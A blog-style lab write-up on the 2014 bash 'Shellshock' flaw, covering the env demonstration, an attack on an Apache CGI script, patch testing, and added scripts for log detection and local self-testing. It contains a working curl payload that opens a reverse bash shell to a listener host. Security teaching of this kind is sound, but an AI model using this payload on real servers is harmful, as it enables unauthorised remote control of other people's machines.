In-depth bash vulnerability analysis and repair testing

Source: Internet
Author: User
Tags: kali linux

On September 25, 2014, a severe bash vulnerability was found on the Internet!
I was confused and did not know what had happened, so I asked "du Niang" (Baidu) to find out. This vulnerability is said to be even worse than the OpenSSL one!
At the time, the fix was to upgrade to bash-4.1.2-15.el6_5.1.x86_64. I tested it on a virtual machine, compared the result with what the Red Hat website said at the time, and thought everything was fine. Then, at noon on September 26, I learned that the patch was invalid and that bash had to be upgraded to bash-4.1.2-15.el6_5.2.x86_64. So I decided to study the vulnerability carefully.
Key words: Bash, ENV, environment variable, CGI, Netcat
[Environment]: one CentOS 6.4 x86_64 machine (with the Apache service enabled) and one Kali Linux PC (upgraded from BT5), connected to each other.
[Part 1: Where is the bash vulnerability?]
CentOS 6.4 x86_64 installs bash-4.1.2-14.el6.x86_64 by default.
(1) Run the env command first. This command can define an environment variable and pass it into the shell command that follows it. The shell here is bash.

(2) env can also define an environment variable whose value is a function definition, and bash executes it as a function.

(3) The bash vulnerability shows up first right on the terminal!

[Part 2: bash-based attack demonstration]
An attack on this vulnerability requires two conditions:
A) A program on the attacked host uses bash as its command interpreter at some point and processes environment variable assignments.
B) The string assigned to the environment variable comes from user input.
Web pages are part of everyday life, so Apache comes to mind right away. I will not go into web development here, but note that bash CGI can also be used to write simple, practical web frameworks for needs such as monitoring and automation.
(1) Start the httpd service and create the file duozhu_cgi in the /var/www/cgi-bin directory with 755 permissions. The file content is as follows.
#!/bin/bash
echo "Content-Type: text/html"
echo ""
echo "<HTML>"
echo "<body>"
echo "zhangduozhu is in Beijing! "
echo "</body>"
echo "</HTML>"

(2) Use a browser to access this page.

This is to simulate normal user access. Next we will simulate the malicious behavior of attackers.

(3) Use the Netcat tool shipped with Kali Linux (ask du Niang for details about the tool) and run nc -lvp 8080 to listen on port 8080 of the local machine. Then open another window and run the curl command below to construct an abnormal HTTP request:
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/192.168.8.149/8080 0>&1' http://192.168.8.153/cgi-bin/duozhu_cgi
This command bounces a bash shell back to port 8080 on the Kali Linux machine.

At this point, a miracle occurred in the listening window of Kali Linux. We successfully got the bash shell !!!

(4) So we can now perform the following operations. Of course, which commands you run depends on your conscience.

Oh ~ This vulnerability is dangerous!
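The two conditions above (bash as the interpreter, attacker-controlled environment strings) are exactly what Apache's CGI handling provides: request headers such as User-Agent are exported to the script as environment variables, and the combined log format records User-Agent. The following added example (not from the original post; the log lines are constructed, and the request/User-Agent layout assumes the Apache combined format) pulls the tell-tale "() {" prefix out of such a log so a defender can see which scripts were probed and from where:

```shell
#!/bin/sh
# Added example, not from the original post: detect Shellshock-style probes
# against CGI scripts in Apache combined-format access logs. Apache logs the
# User-Agent header, and mod_cgi exports that header to the script as
# HTTP_USER_AGENT, so a "() {" prefix there is the tell-tale sign.
# The log lines below are constructed for this example.
SAMPLE_LOG='192.168.8.149 - - [26/Sep/2014:12:00:01 +0800] "GET /cgi-bin/duozhu_cgi HTTP/1.1" 200 78 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.8.149 - - [26/Sep/2014:12:00:05 +0800] "GET /cgi-bin/duozhu_cgi HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c id"
10.0.0.7 - - [26/Sep/2014:12:01:10 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.30.0"
10.0.0.9 - - [26/Sep/2014:12:02:30 +0800] "GET /cgi-bin/duozhu_cgi HTTP/1.1" 200 78 "-" "() { ignored;}; echo probe"'

# Only the lines whose request or User-Agent carries the function-definition
# prefix. -F keeps "() {" literal so grep does not parse it as a regex.
shellshock_probe_lines() {
    printf '%s\n' "$SAMPLE_LOG" | grep -F '() {'
}

# Number of matching lines (tr strips the padding some wc builds print).
count_shellshock_probes() {
    shellshock_probe_lines | wc -l | tr -d ' '
}

# Distinct source addresses that sent a probe (first field of each line).
shellshock_probe_sources() {
    shellshock_probe_lines | awk '{print $1}' | sort -u
}

# Which request paths were targeted, so the defender knows which CGI
# scripts to review. Field 2 when splitting on double quotes is the
# request line; its second word is the path.
shellshock_probe_paths() {
    shellshock_probe_lines | awk -F'"' '{split($2, r, " "); print r[2]}' | sort -u
}

echo "probes: $(count_shellshock_probes)"
echo "sources:"; shellshock_probe_sources
echo "paths:";   shellshock_probe_paths
```

On a real server, replace SAMPLE_LOG with the contents of the access log (for example /var/log/httpd/access_log) and review every path the last function reports.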

[Part 3: bash vulnerability repair]
The fix is simple: if conditions permit, run yum update bash directly to upgrade to bash-4.1.2-15.el6_5.2.x86_64.
If that is not possible, install the RPM package directly.

The tests after the upgrade are as follows:
(1) After the upgrade, the env command shows that function-type environment variables can no longer be defined.
After upgrade: (screenshot)
Before upgrade: (screenshot)

(2) Once this trick no longer works, curl of course gets a normal response, and Netcat receives nothing.
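Part 1 showed env feeding a function-type variable into bash, and the test in Part 3 checks that a patched bash no longer runs what follows the function body. This added script (not from the original post) automates both checks against whatever bash is on the local PATH, so the after-upgrade result can be confirmed without reading screenshots. It assumes bash and env are installed; the function names are invented here.

```shell
#!/bin/sh
# Added example, not from the original post: a local self-test for the
# behaviour the post demonstrates with env. Bash used to execute whatever
# followed the function body in an imported "() { ...; }" variable; a fixed
# bash imports functions only from its own export encoding.

# Legitimate feature: a function exported with "export -f" survives into a
# child bash. This still works after the fix, so it does not rely on the bug.
exported_function_roundtrip() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    bash -c 'greet() { echo ok; }; export -f greet; bash -c greet' 2>/dev/null
}

# Vulnerability probe: the marker is printed only if the child bash runs the
# command that follows the function body while importing x.
check_shellshock() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo "vulnerable" ;;
        *)                   echo "patched" ;;
    esac
}

# Secondary check mirroring Part 3 (1): a raw "() {" variable must reach the
# child as plain text, not as a function. A fixed bash reports "text".
imported_as() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    env x='() { echo function; }' \
        bash -c 'type x >/dev/null 2>&1 && echo function || echo text' 2>/dev/null
}

echo "export -f roundtrip : $(exported_function_roundtrip)"
echo "trailing-command run: $(check_shellshock)"
echo "raw () { variable   : $(imported_as)"
```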

This article from the "Zhang rudder master" blog, please be sure to keep this source http://zdzhu.blog.51cto.com/6180070/1566113
